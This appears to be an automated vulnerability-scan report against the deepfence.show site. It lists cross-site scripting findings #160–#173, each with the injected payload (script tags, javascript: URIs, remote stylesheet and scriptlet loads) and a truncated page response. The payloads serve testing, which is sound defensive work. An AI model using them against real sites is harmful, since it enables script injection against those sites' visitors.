<!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #160\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \\\";alert('XSS');//\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #161\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #162\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #163Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <BODY BACKGROUND=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #164\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <BODY ONLOAD=alert('XSS')>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #165\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG DYNSRC=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #166\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io <IMG LOWSRC=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #167\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <BGSOUND SRC=\"javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #168\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <BR SIZE=\"&{alert('XSS')}\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #169\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <LAYER SRC=\"http://soapui.org/scriptlet.html\"></\nLAYER>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #170\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\n\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #171Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <LINK REL=\"stylesheet\" HREF=\"http://soapui.org/\nxss.css\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #172\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE>@import'http://soapui.org/xss.css';</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #173\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <META HTTP-EQUIV=\"Link\" Content=\"<http://soapui.org/\nxss.css>; REL=stylesheet\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 